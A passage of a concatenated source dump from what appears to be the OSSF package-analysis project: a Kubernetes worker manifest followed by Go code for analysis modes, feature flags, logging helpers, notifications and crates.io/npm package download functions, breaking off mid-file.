OSSMALWARE_WORKER_SUBSCRIPTION 24 | # See: https://pkg.go.dev/gocloud.dev/pubsub/gcppubsub#URLOpener 25 | value: gcppubsub://projects/ossf-malware-analysis/subscriptions/workers?nacklazy=1 26 | - name: OSSF_MALWARE_ANALYSIS_RESULTS 27 | value: gs://ossf-malware-analysis-results 28 | - name: OSSF_MALWARE_ANALYSIS_EXECUTION_LOGS 29 | value: gs://ossf-malware-analysis-execution-logs 30 | - name: OSSF_MALWARE_ANALYSIS_FILE_WRITE_RESULTS 31 | value: gs://ossf-malware-analysis-file-write-results 32 | - name: OSSF_MALWARE_STATIC_ANALYSIS_RESULTS 33 | value: gs://ossf-malware-static-analysis-results-v1 34 | - name: OSSF_MALWARE_ANALYZED_PACKAGES 35 | value: gs://ossf-malware-analysis-analyzed-packages 36 | - name: LOGGER_ENV 37 | value: prod 38 | - name: OSSF_MALWARE_ANALYSIS_PACKAGES 39 | value: gs://ossf-malware-analysis-packages 40 | - name: OSSF_MALWARE_NOTIFICATION_TOPIC 41 | value: gcppubsub://projects/ossf-malware-analysis/topics/analysis-notify 42 | - name: OSSF_MALWARE_USER_AGENT_EXTRA 43 | value: "production" 44 | - name: OSSF_MALWARE_FEATURE_FLAGS 45 | value: "CodeExecution" 46 | securityContext: 47 | privileged: true 48 | volumeMounts: 49 | - mountPath: "/var/lib/containers" 50 | name: image-storage 51 | - mountPath: "/worker_tmp" 52 | name: worker-tmp 53 | resources: 54 | requests: 55 | cpu: 750m 56 | memory: 768Mi 57 | limits: 58 | cpu: 1 59 | memory: 2Gi 60 | volumes: 61 | - name: image-storage 62 | ephemeral: 63 | volumeClaimTemplate: 64 | metadata: 65 | labels: 66 | type: image-storage 67 | spec: 68 | accessModes: 69 | - ReadWriteOnce 70 | storageClassName: premium-rwo 71 | resources: 72 | requests: 73 | storage: 20Gi 74 | - name: worker-tmp 75 | ephemeral: 76 | volumeClaimTemplate: 77 | metadata: 78 | labels: 79 | type: worker-tmp 80 | spec: 81 | accessModes: 82 | - ReadWriteOnce 83 | storageClassName: premium-rwo 84 | resources: 85 | requests: 86 | storage: 5Gi 87 | strategy: 88 | type: "RollingUpdate" 89 | rollingUpdate: 90 | maxUnavailable: "5%" 91 | maxSurge: "1%" 92 | -------------------------------------------------------------------------------- /internal/analysis/mode.go: -------------------------------------------------------------------------------- 1 | package analysis 2 | 3 | // Mode (analysis mode) is used to distinguish between whether static or dynamic analysis is being performed. 4 | type Mode string 5 | 6 | const ( 7 | Dynamic Mode = "dynamic" 8 | Static Mode = "static" 9 | ) 10 | 11 | func AllModes() []Mode { 12 | return []Mode{Dynamic, Static} 13 | } 14 | 15 | func ModeFromString(s string) (Mode, bool) { 16 | switch Mode(s) { 17 | case Dynamic: 18 | return Dynamic, true 19 | case Static: 20 | return Static, true 21 | default: 22 | return "", false 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /internal/analysis/status.go: -------------------------------------------------------------------------------- 1 | package analysis 2 | 3 | import ( 4 | "encoding/json" 5 | 6 | "github.com/ossf/package-analysis/internal/sandbox" 7 | ) 8 | 9 | type Status string 10 | 11 | const ( 12 | // StatusCompleted indicates that the analysis run completed successfully. 13 | StatusCompleted = Status("completed") 14 | 15 | // StatusErrorTimeout indicates that the analysis was aborted due to a 16 | // timeout. 17 | StatusErrorTimeout = Status("error_timeout") 18 | 19 | // StatusErrorAnalysis indicates that the package being analyzed failed 20 | // while running the specified command. 21 | // 22 | // The Stdout and Stderr in the Result should be consulted to understand 23 | // further why it failed. 24 | StatusErrorAnalysis = Status("error_analysis") 25 | 26 | // StatusErrorOther indicates an error during some part of the analysis 27 | // excluding errors covered by other statuses. 28 | StatusErrorOther = Status("error_other") 29 | ) 30 | 31 | // MarshalJSON implements the json.Marshaler interface. 32 | func (s Status) MarshalJSON() ([]byte, error) { 33 | return json.Marshal(string(s)) 34 | } 35 | 36 | func StatusForRunResult(r *sandbox.RunResult) Status { 37 | switch r.Status() { 38 | case sandbox.RunStatusSuccess: 39 | return StatusCompleted 40 | case sandbox.RunStatusFailure: 41 | return StatusErrorAnalysis 42 | case sandbox.RunStatusTimeout: 43 | return StatusErrorTimeout 44 | default: 45 | return StatusErrorOther 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /internal/dynamicanalysis/sandbox_args.go: -------------------------------------------------------------------------------- 1 | package dynamicanalysis 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/internal/pkgmanager" 5 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 6 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 7 | ) 8 | 9 | // defaultCommand returns the path (in the default sandbox image) 10 | // of the default dynamic analysis command for the ecosystem 11 | var defaultCommand = map[pkgecosystem.Ecosystem]string{ 12 | pkgecosystem.CratesIO: "/usr/local/bin/analyze-rust.py", 13 | pkgecosystem.NPM: "/usr/local/bin/analyze-node.js", 14 | pkgecosystem.Packagist: "/usr/local/bin/analyze-php.php", 15 | pkgecosystem.PyPI: "/usr/local/bin/analyze-python.py", 16 | pkgecosystem.RubyGems: "/usr/local/bin/analyze-ruby.rb", 17 | } 18 | 19 | func DefaultCommand(ecosystem pkgecosystem.Ecosystem) string { 20 | cmd := defaultCommand[ecosystem] 21 | if cmd == "" { 22 | panic("unsupported ecosystem: " + ecosystem) 23 | } 24 | return cmd 25 | } 26 | 27 | // MakeAnalysisArgs returns the arguments to pass to the dynamic analysis command in the sandbox 28 | // for the given phase of dynamic analysis on a package. The actual analysis command 29 | // depends on the ecosystem, see pkgmanager.PkgManager.DynamicAnalysisCommand() 30 | func MakeAnalysisArgs(p *pkgmanager.Pkg, phase analysisrun.DynamicPhase) []string { 31 | args := make([]string, 0) 32 | 33 | if p.IsLocal() { 34 | args = append(args, "--local", p.LocalPath()) 35 | } else if p.Version() != "" { 36 | args = append(args, "--version", p.Version()) 37 | } 38 | 39 | if phase == "" { 40 | args = append(args, "all") 41 | } else { 42 | args = append(args, string(phase)) 43 | } 44 | 45 | args = append(args, p.Name()) 46 | 47 | return args 48 | } 49 | -------------------------------------------------------------------------------- /internal/featureflags/featureflags.go: -------------------------------------------------------------------------------- 1 | package featureflags 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "strings" 7 | ) 8 | 9 | var ErrUndefinedFlag = errors.New("undefined feature flag") 10 | 11 | var flagRegistry = make(map[string]*FeatureFlag) 12 | 13 | // FeatureFlag stores the state for a single flag. 14 | // 15 | // Call Enabled() to see if the flag is enabled. 16 | type FeatureFlag struct { 17 | isEnabled bool 18 | } 19 | 20 | // new registers the flag and sets the default enabled state. 21 | func new(name string, defaultEnabled bool) *FeatureFlag { 22 | ff := &FeatureFlag{ 23 | isEnabled: defaultEnabled, 24 | } 25 | flagRegistry[name] = ff 26 | return ff 27 | } 28 | 29 | // Enabled returns whether or not the feature is enabled. 30 | func (ff *FeatureFlag) Enabled() bool { 31 | return ff.isEnabled 32 | } 33 | 34 | // Update changes the internal state of the flags based on flags passed in. 35 | // 36 | // flags is a comma separated list of flag names. If a flag name is present it 37 | // will be enabled. If a flag name is preceeded with a "-" character it will be 38 | // disabled. 39 | // 40 | // For example: "MyFeature,-ExperimentalFeature" will enable the flag "MyFeature" 41 | // and disable the flag "ExperimentalFeature". 42 | // 43 | // If a flag is undefined an error wrapping ErrUndefinedFlag will be returned. 44 | func Update(flags string) error { 45 | if flags == "" { 46 | return nil 47 | } 48 | for _, n := range strings.Split(flags, ",") { 49 | isEnabled := true 50 | if n[0] == '-' { 51 | isEnabled = false 52 | n = n[1:] 53 | } 54 | if ff, ok := flagRegistry[n]; ok { 55 | ff.isEnabled = isEnabled 56 | } else { 57 | return fmt.Errorf("%w %q", ErrUndefinedFlag, n) 58 | } 59 | } 60 | return nil 61 | } 62 | 63 | // State returns a representation of the flags that are enabled and disabled. 64 | func State() map[string]bool { 65 | s := make(map[string]bool) 66 | for k, v := range flagRegistry { 67 | s[k] = v.Enabled() 68 | } 69 | return s 70 | } 71 | -------------------------------------------------------------------------------- /internal/featureflags/featureflags_test.go: -------------------------------------------------------------------------------- 1 | package featureflags 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func resetRegistry() { 9 | flagRegistry = make(map[string]*FeatureFlag) 10 | } 11 | 12 | func TestFlagDefault_True(t *testing.T) { 13 | resetRegistry() 14 | ff := new("TestFlag", true) 15 | if !ff.Enabled() { 16 | t.Error("Enabled() = false; want true") 17 | } 18 | } 19 | 20 | func TestFlagDefault_False(t *testing.T) { 21 | resetRegistry() 22 | ff := new("TestFlag", false) 23 | if ff.Enabled() { 24 | t.Error("Enabled() = true; want false") 25 | } 26 | } 27 | 28 | func TestFlagUpdate_SingleFlag(t *testing.T) { 29 | resetRegistry() 30 | ff := new("TestFlag", false) 31 | Update("TestFlag") 32 | 33 | if !ff.Enabled() { 34 | t.Error("Enabled() = false; want true") 35 | } 36 | } 37 | 38 | func TestFlagUpdate_SingleFlagOff(t *testing.T) { 39 | resetRegistry() 40 | ff := new("TestFlag", true) 41 | Update("-TestFlag") 42 | 43 | if ff.Enabled() { 44 | t.Error("Enabled() = true; want false") 45 | } 46 | } 47 | 48 | func TestFlagUpdate_MultiFlags(t *testing.T) { 49 | resetRegistry() 50 | new("TestFlag1", false) 51 | new("TestFlag2", true) 52 | new("TestFlag3", false) 53 | Update("TestFlag1,-TestFlag2,TestFlag3") 54 | want := map[string]bool{ 55 | "TestFlag1": true, 56 | "TestFlag2": false, 57 | "TestFlag3": true, 58 | } 59 | if got := State(); !reflect.DeepEqual(want, got) { 60 | t.Errorf("State() = %v; want %v", got, want) 61 | } 62 | } 63 | 64 | func TestFlagUpdate_MultiFlags_EmptyString(t *testing.T) { 65 | resetRegistry() 66 | new("TestFlag1", false) 67 | new("TestFlag2", true) 68 | new("TestFlag3", false) 69 | Update("") 70 | want := map[string]bool{ 71 | "TestFlag1": false, 72 | "TestFlag2": true, 73 | "TestFlag3": false, 74 | } 75 | if got := State(); !reflect.DeepEqual(want, got) { 76 | t.Errorf("State() = %v; want %v", got, want) 77 | } 78 | } 79 | 80 | func TestFlagUpdate_Error(t *testing.T) { 81 | resetRegistry() 82 | err := Update("TestFlag") 83 | if err == nil { 84 | t.Errorf("Update() = nil; want an error") 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /internal/featureflags/features.go: -------------------------------------------------------------------------------- 1 | package featureflags 2 | 3 | var ( 4 | // WriteFileContents will store the contents of write observed from strace 5 | // data during dynamic analysis. 6 | WriteFileContents = new("WriteFileContents", true) 7 | 8 | // SaveAnalyzedPackages downloads the package archive and saves it 9 | // to the analyzed packages bucket (if configured) after analysis completes 10 | SaveAnalyzedPackages = new("SaveAnalyzedPackages", true) 11 | 12 | // PubSubExtender determines whether the worker uses a real GCP extender 13 | // for keeping messages alive during long-running processing. 14 | PubSubExtender = new("PubSubExtender", true) 15 | 16 | // CodeExecution invokes package code automatically during dynamic analysis, 17 | // which may uncover extra malicious behaviour. The names of executed functions, 18 | // methods and classes are logged to a file. 19 | CodeExecution = new("CodeExecution", true) 20 | 21 | // StraceDebugLogging enables verbose logging of strace parsing during dynamic analysis. 22 | // This feature can only be used in the analysis image, and if enabled, the -strace-logs-dir 23 | // flag must also be set. When enabled, the log files are then accessible via an explicit 24 | // docker mount or copy of the specified directory from the container to the host filesystem. 25 | StraceDebugLogging = new("StraceDebugLogging", false) 26 | ) 27 | -------------------------------------------------------------------------------- /internal/log/context.go: -------------------------------------------------------------------------------- 1 | package log 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | ) 7 | 8 | type attrSliceContextKey struct{} 9 | 10 | func attrSliceFromContext(ctx context.Context) []slog.Attr { 11 | if v := ctx.Value(attrSliceContextKey{}); v != nil { 12 | return v.([]slog.Attr) 13 | } 14 | return nil 15 | } 16 | 17 | // ContextWithAttrs is used to add attrs to the context so they are included 18 | // when logs are output. 19 | func ContextWithAttrs(ctx context.Context, attr ...slog.Attr) context.Context { 20 | if len(attr) == 0 { 21 | return ctx 22 | } 23 | attrSlice := append(attrSliceFromContext(ctx), attr...) 24 | return context.WithValue(ctx, attrSliceContextKey{}, attrSlice) 25 | } 26 | 27 | func ClearContextAttrs(ctx context.Context) context.Context { 28 | attrSlice := attrSliceFromContext(ctx) 29 | if attrSlice == nil { 30 | return ctx 31 | } 32 | return context.WithValue(ctx, attrSliceContextKey{}, nil) 33 | } 34 | 35 | // LoggerWithContext returns a logger with any attrs in the context passed to 36 | // the logger. 37 | // 38 | // Note: duplicate attributes may be logged if ctx, or a descendent, is used 39 | // later in a call to (Debug|Info|Warn|Error)Context on the returned slog.Logger. 40 | // 41 | // If the same context is needed, call ClearContextAttrs on the context to avoid 42 | // logging the attrs again. 43 | func LoggerWithContext(logger *slog.Logger, ctx context.Context) *slog.Logger { 44 | attrSlice := attrSliceFromContext(ctx) 45 | if len(attrSlice) == 0 { 46 | return logger 47 | } 48 | return slog.New(logger.Handler().WithAttrs(attrSlice)) 49 | } 50 | 51 | type contextLogHandler struct { 52 | handler slog.Handler 53 | } 54 | 55 | func (h *contextLogHandler) Handle(ctx context.Context, r slog.Record) error { 56 | attrSlice := attrSliceFromContext(ctx) 57 | if len(attrSlice) > 0 { 58 | r.AddAttrs(attrSlice...) 59 | } 60 | return h.handler.Handle(ctx, r) 61 | } 62 | 63 | func (h *contextLogHandler) WithAttrs(attrs []slog.Attr) slog.Handler { 64 | return &contextLogHandler{ 65 | handler: h.handler.WithAttrs(attrs), 66 | } 67 | } 68 | 69 | func (h *contextLogHandler) WithGroup(name string) slog.Handler { 70 | return &contextLogHandler{ 71 | handler: h.handler.WithGroup(name), 72 | } 73 | } 74 | 75 | func (h *contextLogHandler) Enabled(ctx context.Context, l slog.Level) bool { 76 | return h.handler.Enabled(ctx, l) 77 | } 78 | 79 | func NewContextLogHandler(handler slog.Handler) slog.Handler { 80 | return &contextLogHandler{ 81 | handler: handler, 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /internal/log/context_test.go: -------------------------------------------------------------------------------- 1 | package log_test 2 | 3 | import ( 4 | "context" 5 | "testing" 6 | 7 | "log/slog" 8 | 9 | "github.com/ossf/package-analysis/internal/log" 10 | ) 11 | 12 | func assertRecordAttrs(t *testing.T, r slog.Record, attrs []slog.Attr) { 13 | t.Helper() 14 | 15 | wantLen := len(attrs) 16 | gotLen := r.NumAttrs() 17 | if wantLen != gotLen { 18 | t.Errorf("record.NumAttrs() = %v; want %v", gotLen, wantLen) 19 | } 20 | 21 | r.Attrs(func(a slog.Attr) bool { 22 | for _, attr := range attrs { 23 | if a.Equal(attr) { 24 | return true 25 | } 26 | } 27 | t.Errorf("unexpected attr %v", a) 28 | return true 29 | }) 30 | } 31 | 32 | func TestContextWithAttrs(t *testing.T) { 33 | attr1 := slog.Any("hello", "world") 34 | attr2 := slog.Int("meaning", 42) 35 | attr3 := slog.String("a", "b") 36 | 37 | h := &testHandler{} 38 | logger := slog.New(log.NewContextLogHandler(h)) 39 | 40 | ctx := context.Background() 41 | 42 | // Add attrs to the context and ensure they are used. 43 | ctx = log.ContextWithAttrs(ctx, attr1, attr2) 44 | logger.InfoContext(ctx, "test", "a", "b") 45 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3}) 46 | } 47 | 48 | func TestContextWithAttrs_InnerCtx(t *testing.T) { 49 | attr1 := slog.Any("hello", "world") 50 | attr2 := slog.Int("meaning", 42) 51 | attr3 := slog.Any("complex", struct{ a string }{a: "string"}) 52 | 53 | h := &testHandler{} 54 | logger := slog.New(log.NewContextLogHandler(h)) 55 | 56 | ctx := context.Background() 57 | ctx = log.ContextWithAttrs(ctx, attr1, attr2) 58 | 59 | // Add more attrs to the context and ensure they are used. 60 | innerCtx := log.ContextWithAttrs(ctx, attr3) 61 | logger.InfoContext(innerCtx, "test") 62 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3}) 63 | } 64 | 65 | func TestContextWithAttrs_OuterAfterInnerCtx(t *testing.T) { 66 | attr1 := slog.Any("hello", "world") 67 | attr2 := slog.Int("meaning", 42) 68 | attr3 := slog.Any("complex", struct{ a string }{a: "string"}) 69 | 70 | h := &testHandler{} 71 | logger := slog.New(log.NewContextLogHandler(h)) 72 | 73 | ctx := context.Background() 74 | ctx = log.ContextWithAttrs(ctx, attr1, attr2) 75 | _ = log.ContextWithAttrs(ctx, attr3) 76 | 77 | // Use the earlier context to ensure the innerCtx attrs are not included. 78 | logger.InfoContext(ctx, "test") 79 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2}) 80 | } 81 | 82 | func TestContextWithAttrs_NoAttrs(t *testing.T) { 83 | attr1 := slog.String("a", "b") 84 | 85 | h := &testHandler{} 86 | logger := slog.New(log.NewContextLogHandler(h)) 87 | 88 | ctx := context.Background() 89 | ctx = log.ContextWithAttrs(ctx) 90 | 91 | logger.InfoContext(ctx, "test", "a", "b") 92 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1}) 93 | } 94 | 95 | func TestLoggerWithContext(t *testing.T) { 96 | attr1 := slog.Any("hello", "world") 97 | attr2 := slog.Int("meaning", 42) 98 | attr3 := slog.String("a", "b") 99 | 100 | h := &testHandler{} 101 | logger := slog.New(log.NewContextLogHandler(h)) 102 | 103 | ctx := context.Background() 104 | ctx = log.ContextWithAttrs(ctx, attr1) 105 | logger = log.LoggerWithContext(logger, ctx) 106 | 107 | ctx = log.ContextWithAttrs(log.ClearContextAttrs(ctx), attr2) 108 | 109 | logger.InfoContext(ctx, "test", "a", "b") 110 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3}) 111 | } 112 | -------------------------------------------------------------------------------- /internal/log/log.go: -------------------------------------------------------------------------------- 1 | // Package log wraps Uber's Zap logging library to make it easy to use across 2 | // the project. 3 | // 4 | // Initialize() MUST be called before the first logging statement, if it is not 5 | // called the command will panic and exit. 6 | // 7 | // See the Zap docs for more details: https://pkg.go.dev/go.uber.org/zap 8 | package log 9 | 10 | import ( 11 | golog "log" 12 | "log/slog" 13 | "strings" 14 | 15 | "github.com/blendle/zapdriver" 16 | "go.uber.org/zap" 17 | "go.uber.org/zap/exp/zapslog" 18 | ) 19 | 20 | // LoggingEnv is used to represent a specific configuration used by a given 21 | // environment. 22 | type LoggingEnv string 23 | 24 | // String implements the Stringer interface. 25 | func (e LoggingEnv) String() string { 26 | return string(e) 27 | } 28 | 29 | const ( 30 | LoggingEnvDev LoggingEnv = "dev" 31 | LoggingEnvProd LoggingEnv = "prod" 32 | 33 | // StraceDebugLogDir is a hardcoded directory that can be used to store 34 | // the strace debug log, if the strace debug logging feature is enabled 35 | StraceDebugLogDir = "/straceLogs" 36 | ) 37 | 38 | var ( 39 | defaultLoggingEnv LoggingEnv = LoggingEnvDev 40 | ) 41 | 42 | func DefaultLoggingEnv() LoggingEnv { 43 | return defaultLoggingEnv 44 | } 45 | 46 | // Initialize the logger for logging. 47 | // 48 | // Passing in "true" will use Zap's default production configuration, while 49 | // "false" will use the default development configuration. 50 | // 51 | // Note: this method MUST be called before any other method in this package. 52 | func Initialize(env string) { 53 | // TODO: replace zap entirely with native slog. 54 | // Note that zap currently provides some useful features, such as prod and 55 | // dev environments, standard logger replacement, and GCP StackDriver 56 | // integration. Since log/slog is so new, many of the same capabilities are 57 | // yet to receive good support in third-party libraries. 58 | var err error 59 | var logger *zap.Logger 60 | switch strings.ToLower(env) { 61 | case LoggingEnvProd.String(): 62 | defaultLoggingEnv = LoggingEnvProd 63 | config := zapdriver.NewProductionConfig() 64 | // Make sure sampling is disabled. 65 | config.Sampling = nil 66 | // Build the logger and ensure we use the zapdriver Core so that labels 67 | // are handled correctly. 68 | logger, err = config.Build(zapdriver.WrapCore()) 69 | case LoggingEnvDev.String(): 70 | fallthrough 71 | default: 72 | logger, err = zap.NewDevelopment() 73 | } 74 | if err != nil { 75 | golog.Panic(err) 76 | } 77 | zap.RedirectStdLog(logger) 78 | // Ensure slog.Default logs to the same destination as zap. 79 | slogger := slog.New(NewContextLogHandler(zapslog.NewHandler(logger.Core(), zapslog.WithCaller(true)))) 80 | slog.SetDefault(slogger) 81 | } 82 | 83 | // Label causes attributes written by zapdriver to be marked as labels inside 84 | // StackDriver when LoggingEnv is LoggingEnvProd. Otherwise it wraps slog.String. 85 | func Label(key, value string) slog.Attr { 86 | if defaultLoggingEnv == LoggingEnvProd { 87 | return slog.String("labels."+key, value) 88 | } else { 89 | return slog.String(key, value) 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /internal/log/log_test.go: -------------------------------------------------------------------------------- 1 | package log_test 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | ) 7 | 8 | type testHandler struct { 9 | slog.Handler 10 | 11 | root *testHandler 12 | records []slog.Record 13 | attrs []slog.Attr 14 | } 15 | 16 | func (h *testHandler) getRoot() *testHandler { 17 | if h.root == nil { 18 | return h 19 | } 20 | return h.root 21 | } 22 | 23 | func (h *testHandler) LastRecord() slog.Record { 24 | root := h.getRoot() 25 | l := len(root.records) 26 | if l == 0 { 27 | return slog.Record{} 28 | } 29 | return root.records[l-1] 30 | } 31 | 32 | func (h *testHandler) All() []slog.Record { 33 | root := h.getRoot() 34 | return root.records 35 | } 36 | 37 | func (h *testHandler) Len() int { 38 | root := h.getRoot() 39 | return len(root.records) 40 | } 41 | 42 | func (h *testHandler) Enabled(_ context.Context, _ slog.Level) bool { 43 | return true 44 | } 45 | 46 | func (h *testHandler) Handle(ctx context.Context, r slog.Record) error { 47 | r.AddAttrs(h.attrs...) 48 | root := h.getRoot() 49 | root.records = append(h.getRoot().records, r) 50 | return nil 51 | } 52 | 53 | func (h *testHandler) WithAttrs(attrs []slog.Attr) slog.Handler { 54 | return &testHandler{ 55 | root: h.getRoot(), 56 | attrs: append(h.attrs, attrs...), 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /internal/log/writer.go: -------------------------------------------------------------------------------- 1 | package log 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "io" 7 | "log/slog" 8 | "unicode" 9 | ) 10 | 11 | // NewWriter returns an io.WriteCloser that logs each line written as a single 12 | // log entry at the given level with the supplied keysAndValues. 13 | // 14 | // Close() must be called to free up the resources used and flush any unwritten 15 | // log entries to the logger. 16 | func NewWriter(ctx context.Context, logger *slog.Logger, level slog.Level) io.WriteCloser { 17 | return &writer{ 18 | ctx: ctx, 19 | logger: logger, 20 | level: level, 21 | } 22 | } 23 | 24 | type writer struct { 25 | ctx context.Context 26 | logger *slog.Logger 27 | level slog.Level 28 | buffer bytes.Buffer 29 | } 30 | 31 | // Write implements the io.Writer interface. 32 | // 33 | // Each line of bytes written appears as a log entry. 34 | func (w *writer) Write(p []byte) (int, error) { 35 | written := 0 36 | for { 37 | if len(p) == 0 { 38 | // p is now empty, so exit with the bytes written 39 | return written, nil 40 | } 41 | i := bytes.IndexByte(p, '\n') 42 | if i == -1 { 43 | // No more newlines to consume, so save the buffer and return 44 | n, err := w.buffer.Write(p) 45 | return written + n, err 46 | } 47 | // Append to the buffer. 48 | n, err := w.buffer.Write(p[:i]) 49 | written += n 50 | if err != nil { 51 | return written, err 52 | } 53 | // Update the input and consume the newline 54 | p = p[i+1:] 55 | written += 1 56 | // Dump the buffer to the log 57 | line := w.buffer.Bytes() 58 | // Trim any trailing space - this won't include the newline 59 | line = bytes.TrimRightFunc(line, unicode.IsSpace) 60 | // Swallow any empty lines 61 | if len(line) > 0 { 62 | w.logger.Log(w.ctx, w.level, string(line)) 63 | } 64 | // Reset the buffer. 65 | w.buffer.Reset() 66 | } 67 | } 68 | 69 | // Close implements the io.Closer interface. 70 | // 71 | // Any unwritten bytes written as a final log entry. 72 | func (w *writer) Close() error { 73 | if w.buffer.Len() > 0 { 74 | w.logger.Log(w.ctx, w.level, w.buffer.String()) 75 | w.buffer.Reset() 76 | } 77 | return nil 78 | } 79 | -------------------------------------------------------------------------------- /internal/notification/notification.go: -------------------------------------------------------------------------------- 1 | package notification 2 | 3 | import ( 4 | "context" 5 | "encoding/json" 6 | "fmt" 7 | 8 | "gocloud.dev/pubsub" 9 | 10 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 11 | "github.com/ossf/package-analysis/pkg/api/notification" 12 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 13 | ) 14 | 15 | func PublishAnalysisCompletion(ctx context.Context, notificationTopic *pubsub.Topic, name, version string, ecosystem pkgecosystem.Ecosystem) error { 16 | k := analysisrun.Key{Name: name, Version: version, Ecosystem: ecosystem} 17 | notificationMsg, err := json.Marshal(notification.AnalysisRunComplete{Key: k}) 18 | if err != nil { 19 | return fmt.Errorf("failed to encode completion notification: %w", err) 20 | } 21 | err = notificationTopic.Send(ctx, &pubsub.Message{ 22 | Body: notificationMsg, 23 | Metadata: nil, 24 | }) 25 | if err != nil { 26 | return fmt.Errorf("failed to send completion notification: %w", err) 27 | } 28 | return nil 29 | } 30 | -------------------------------------------------------------------------------- /internal/pkgmanager/crates.io.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | "strings" 8 | 9 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 10 | ) 11 | 12 | type cratesJSON struct { 13 | Versions []struct { 14 | Num string `json:"num"` 15 | } `json:"versions"` 16 | } 17 | 18 | func getCratesLatest(pkg string) (string, error) { 19 | resp, err := http.Get(fmt.Sprintf("https://crates.io/api/v1/crates/%s/versions", pkg)) 20 | if err != nil { 21 | return "", err 22 | } 23 | defer resp.Body.Close() 24 | 25 | decoder := json.NewDecoder(resp.Body) 26 | var details cratesJSON 27 | err = decoder.Decode(&details) 28 | if err != nil { 29 | return "", err 30 | } 31 | 32 | return details.Versions[0].Num, nil 33 | } 34 | 35 | func getCratesArchiveURL(pkgName, version string) (string, error) { 36 | pkgURL := fmt.Sprintf("https://crates.io/api/v1/crates/%s/%s/download", pkgName, version) 37 | resp, err := http.Get(pkgURL) 38 | if err != nil { 39 | return "", err 40 | } 41 | defer resp.Body.Close() 42 | 43 | return pkgURL, nil 44 | } 45 | 46 | func getCratesArchiveFilename(pkgName, version, _ string) string { 47 | return strings.Join([]string{pkgName, "-", version, ".tar.gz"}, "") 48 | } 49 | 50 | var cratesPkgManager = PkgManager{ 51 | ecosystem: pkgecosystem.CratesIO, 52 | latestVersion: getCratesLatest, 53 | archiveURL: getCratesArchiveURL, 54 | archiveFilename: getCratesArchiveFilename, 55 | } 56 | -------------------------------------------------------------------------------- /internal/pkgmanager/download.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "fmt" 5 | "io" 6 | "net/http" 7 | "os" 8 | ) 9 | 10 | /* 11 | downloadToPath creates (and/or truncates) a file at the given path, then writes 12 | contents of whatever is at the given URL to that given file using downloadToFile, 13 | and finally closes the file. 14 | 15 | If any error occurs, the created file is removed. 16 | 17 | Callers must ensure that path and url are nonempty, otherwise the function will panic. 18 | */ 19 | func downloadToPath(path, url string) error { 20 | if path == "" { 21 | panic("path is empty") 22 | } 23 | if url == "" { 24 | panic("url is empty") 25 | } 26 | 27 | file, err := os.Create(path) 28 | if err != nil { 29 | return err 30 | } 31 | 32 | if downloadErr := downloadToFile(file, url); downloadErr != nil { 33 | // cleanup file 34 | if removeErr := os.Remove(path); removeErr != nil { 35 | return fmt.Errorf("%w\n%v", downloadErr, removeErr) 36 | } 37 | return downloadErr 38 | } 39 | 40 | if closeErr := file.Close(); closeErr != nil { 41 | // cleanup file 42 | if removeErr := os.Remove(path); removeErr != nil { 43 | return fmt.Errorf("%w\n%v", closeErr, removeErr) 44 | } 45 | return closeErr 46 | } 47 | 48 | return nil 49 | } 50 | 51 | /* 52 | downloadToFile writes the contents of whatever is at the given URL to the 53 | given file, without opening or closing the file. If any errors occur while 54 | making the network request, then no file operations will be performed. 55 | 56 | Callers must ensure that url is nonempty, otherwise the function will panic. 57 | */ 58 | func downloadToFile(dest *os.File, url string) error { 59 | if url == "" { 60 | panic("url is empty") 61 | } 62 | 63 | resp, err := http.Get(url) 64 | if err != nil { 65 | return err 66 | } 67 | 68 | defer resp.Body.Close() 69 | 70 | if resp.StatusCode != http.StatusOK { 71 | return fmt.Errorf("http status %s", resp.Status) 72 | } 73 | 74 | if _, err := io.Copy(dest, resp.Body); err != nil { 75 | return err 76 | } 77 | 78 | return nil 79 | } 80 | -------------------------------------------------------------------------------- /internal/pkgmanager/npm.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "io" 7 | "net/http" 8 | "strings" 9 | 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 12 | ) 13 | 14 | // npmPackageJSON represents relevant JSON data from the NPM registry response 15 | // when package information is requested. 16 | // See https://github.com/npm/registry/blob/master/docs/responses/package-metadata.md 17 | type npmPackageJSON struct { 18 | DistTags struct { 19 | Latest string `json:"latest"` 20 | } `json:"dist-tags"` 21 | } 22 | 23 | // npmVersionJSON represents relevant JSON data from the NPM registry response 24 | // when package version information is requested. 25 | // See https://github.com/npm/registry/blob/master/docs/responses/package-metadata.md 26 | type npmVersionJSON struct { 27 | Dist struct { 28 | Tarball string `json:"tarball"` 29 | } `json:"dist"` 30 | } 31 | 32 | func getNPMLatest(pkg string) (string, error) { 33 | resp, err := http.Get(fmt.Sprintf("https://registry.npmjs.org/%s", pkg)) 34 | if err != nil { 35 | return "", err 36 | } 37 | defer resp.Body.Close() 38 | 39 | decoder := json.NewDecoder(resp.Body) 40 | var details npmPackageJSON 41 | err = decoder.Decode(&details) 42 | if err != nil { 43 | return "", err 